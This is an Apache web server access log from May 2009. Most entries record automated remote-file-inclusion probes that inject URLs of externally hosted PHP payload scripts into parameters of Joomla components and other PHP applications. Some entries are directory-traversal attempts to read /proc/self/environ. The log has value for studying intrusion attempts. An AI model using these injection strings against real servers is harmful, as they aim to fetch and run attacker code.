91.206.183.148 - - [20/May/2009:05:17:41 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.34.161.16 - - [20/May/2009:05:17:57 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:05:18:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.237.82.158 - - [20/May/2009:05:19:18 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.237.82.158 - - [20/May/2009:05:19:18 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.237.82.158 - - [20/May/2009:05:19:18 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:19:33 -0400] "GET /logs/access_log.Q108120300//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:19:34 -0400] "GET /logs/access_log.Q108111700//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
69.59.148.76 - - [20/May/2009:05:19:37 -0400] "GET /logs/access_log.Q109050900///appserv/main.php?appserv_root=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.69"
69.59.148.76 - - [20/May/2009:05:19:37 -0400] "GET /logs/access_log.Q109050900///appserv/main.php?appserv_root=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.69"
69.59.148.76 - - [20/May/2009:05:19:37 -0400] "GET ///appserv/main.php?appserv_root=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.69"
69.59.148.76 - - [20/May/2009:05:19:37 -0400] "GET ///appserv/main.php?appserv_root=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.69"
69.59.148.76 - - [20/May/2009:05:19:37 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.69"
69.59.148.76 - - [20/May/2009:05:19:37 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.69"
110.45.144.106 - - [20/May/2009:05:19:58 -0400] "GET //include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:19:58 -0400] "GET /logs/access_log.Q109021500//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:19:58 -0400] "GET /logs//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:19:58 -0400] "GET /logs/access_log.Q109032000//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:19:58 -0400] "GET //include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:19:58 -0400] "GET /logs//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:19:58 -0400] "GET /logs/access_log.Q109021500//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:19:58 -0400] "GET /logs/access_log.Q109032000//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:20:00 -0400] "GET //include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:20:00 -0400] "GET /logs//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:20:00 -0400] "GET /logs/access_log.Q109021500//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:20:00 -0400] "GET /logs/access_log.Q109032000//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:20:40 -0400] "GET /logs/access_log.Q108111700//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:20:42 -0400] "GET /logs/access_log.Q108111700//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:20:42 -0400] "GET /logs/access_log.Q108120300//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
65.98.80.2 - - [20/May/2009:05:20:48 -0400] "GET /logs/access_log.Q108112700/index2.php?include_path=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:05:20:48 -0400] "GET /index2.php?include_path=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:05:20:49 -0400] "GET /logs/index2.php?include_path=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
110.45.144.106 - - [20/May/2009:05:20:53 -0400] "GET /logs/access_log.Q109021500%20%20//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:20:53 -0400] "GET /logs/access_log.Q109032000%20%20//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:20:55 -0400] "GET /logs/access_log.Q109021500%20%20//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:20:55 -0400] "GET /logs/access_log.Q109032000%20%20//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:21:03 -0400] "GET /logs/access_log.Q109021500%20%20//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:21:03 -0400] "GET /logs/access_log.Q109032000%20%20//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:21:03 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:21:03 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:21:05 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.93.221.42 - - [20/May/2009:05:21:17 -0400] "GET /logs/access_log.Q109051200/index.php?sayfa=http://tornavida.to.funpic.org/bot/zxid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
91.206.183.148 - - [20/May/2009:05:21:23 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.142.171 - - [20/May/2009:05:21:32 -0400] "GET /logs/error_log.Q107092400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.231.24.38 - - [20/May/2009:05:21:41 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
222.231.24.38 - - [20/May/2009:05:21:41 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
222.231.24.38 - - [20/May/2009:05:21:41 -0400] "GET /?sourcedir=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
222.231.24.38 - - [20/May/2009:05:21:41 -0400] "GET /?sourcedir=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
65.98.80.2 - - [20/May/2009:05:21:41 -0400] "GET /logs/access_log.Q109050700/index2.php?include_path=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
222.231.24.38 - - [20/May/2009:05:21:42 -0400] "GET /logs/?sourcedir=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 2088 "-" "libwww-perl/5.805"
222.231.24.38 - - [20/May/2009:05:21:42 -0400] "GET /logs/?sourcedir=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 2088 "-" "libwww-perl/5.805"
69.94.30.156 - - [20/May/2009:05:21:55 -0400] "GET /logs/access_log.Q108112700/index2.php?include_path=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
69.94.30.156 - - [20/May/2009:05:21:55 -0400] "GET /index2.php?include_path=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
69.94.30.156 - - [20/May/2009:05:21:55 -0400] "GET /logs/index2.php?include_path=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
69.237.82.158 - - [20/May/2009:05:22:04 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:22:18 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:22:52 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:22:52 -0400] "GET /logs/error_log.Q109051300//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:05:22:52 -0400] "GET /images/over-index5_mcrnedlhol.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
88.84.128.40 - - [20/May/2009:05:22:55 -0400] "GET /logs/access_log.Q108052400//?p=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:05:22:55 -0400] "GET //?p=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:05:22:56 -0400] "GET /logs//?p=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2093 "-" "libwww-perl/5.803"
217.147.29.190 - - [20/May/2009:05:23:06 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:23:06 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:23:06 -0400] "GET /logs/access_log.Q109051200%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:23:06 -0400] "GET /logs/access_log.Q109050700%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.94.30.156 - - [20/May/2009:05:23:12 -0400] "GET /logs/access_log.Q109050700/index2.php?include_path=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.200.8.89 - - [20/May/2009:05:23:14 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:05:23:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.135.14 - - [20/May/2009:05:23:27 -0400] "GET /logs/access_log.Q108052400//?p=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:05:23:28 -0400] "GET //?p=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:05:23:28 -0400] "GET /logs//?p=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2093 "-" "libwww-perl/5.805"
65.23.158.226 - - [20/May/2009:05:23:43 -0400] "GET /logs/access_log.Q108120600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
94.97.72.204 - - [20/May/2009:05:23:45 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={FD7759AA-B380-479D-A21B-6AABF275B8A5}; InfoPath.2)"
94.97.72.204 - - [20/May/2009:05:23:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={FD7759AA-B380-479D-A21B-6AABF275B8A5}; InfoPath.2)"
94.97.72.204 - - [20/May/2009:05:23:48 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={FD7759AA-B380-479D-A21B-6AABF275B8A5}; InfoPath.2)"
94.97.72.204 - - [20/May/2009:05:23:48 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={FD7759AA-B380-479D-A21B-6AABF275B8A5}; InfoPath.2)"
218.1.64.133 - - [20/May/2009:05:23:58 -0400] "GET /logs/access_log.Q109051100/senetman/html/index.php?page=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.1.64.133 - - [20/May/2009:05:23:58 -0400] "GET /senetman/html/index.php?page=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.1.64.133 - - [20/May/2009:05:23:58 -0400] "GET /logs/senetman/html/index.php?page=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.1.64.133 - - [20/May/2009:05:23:59 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
218.1.64.133 - - [20/May/2009:05:23:59 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
218.1.64.133 - - [20/May/2009:05:23:59 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
218.1.64.133 - - [20/May/2009:05:23:59 -0400] "GET /senetman/html/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 221 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:05:23:59 -0400] "GET /logs/senetman/html/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 226 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:05:23:59 -0400] "GET /logs/access_log.Q109051100/senetman/html/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 248 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:05:24:00 -0400] "GET /senetman/html/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 221 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:05:24:00 -0400] "GET /logs/senetman/html/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:05:24:00 -0400] "GET /logs/access_log.Q109051100/senetman/html/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "XXXXXX"
72.52.230.168 - - [20/May/2009:05:24:24 -0400] "GET //?_zb_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.52.230.168 - - [20/May/2009:05:24:24 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.52.230.168 - - [20/May/2009:05:24:24 -0400] "GET /logs//?_zb_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 2093 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:24:27 -0400] "GET /logs/access_log.Q109051200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:24:27 -0400] "GET /logs/access_log.Q109050700/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:05:24:58 -0400] "GET //?_zb_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:05:24:58 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:05:24:58 -0400] "GET /logs//?_zb_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 2093 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:25:58 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:25:58 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:25:58 -0400] "GET /logs/access_log.Q109051200%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:25:59 -0400] "GET /logs/access_log.Q109050700%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:26:08 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:26:15 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:26:15 -0400] "GET /logs/access_log.Q109051200%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:26:15 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:26:17 -0400] "GET /logs/access_log.Q109050700%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.231.24.38 - - [20/May/2009:05:26:18 -0400] "GET /logs/error_log.Q108090500/?sourcedir=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
222.231.24.38 - - [20/May/2009:05:26:18 -0400] "GET /logs/error_log.Q108090500/?sourcedir=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
218.1.64.133 - - [20/May/2009:05:27:01 -0400] "GET /logs/access_log.Q108072100/senetman/html/index.php?page=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.106.135.14 - - [20/May/2009:05:27:01 -0400] "GET /logs/access_log.Q108052400//?pag=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:05:27:01 -0400] "GET //?pag=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
218.1.64.133 - - [20/May/2009:05:27:01 -0400] "GET /logs/access_log.Q108072100/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
87.106.135.14 - - [20/May/2009:05:27:01 -0400] "GET /logs//?pag=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2093 "-" "libwww-perl/5.805"
218.1.64.133 - - [20/May/2009:05:27:02 -0400] "GET /logs/access_log.Q108072100/senetman/html/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 248 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:05:27:02 -0400] "GET /logs/access_log.Q108072100/senetman/html/index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "XXXXXX"
88.84.128.40 - - [20/May/2009:05:27:08 -0400] "GET /logs/access_log.Q108052400//?pag=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:05:27:08 -0400] "GET //?pag=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:05:27:08 -0400] "GET /logs//?pag=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2093 "-" "libwww-perl/5.803"
110.45.144.106 - - [20/May/2009:05:27:09 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:27:09 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:27:17 -0400] "GET /logs/access_log.Q109050300//components/com_extcalendar/admin.extcalendar.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:27:19 -0400] "GET /logs/access_log.Q109040700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:27:19 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:27:30 -0400] "GET /logs/access_log.Q108071500//components/com_extcalendar/admin.extcalendar.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:27:42 -0400] "GET /logs/access_log.Q109051200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:27:42 -0400] "GET /logs/access_log.Q109050700/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:05:28:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.144.106 - - [20/May/2009:05:28:36 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:28:36 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
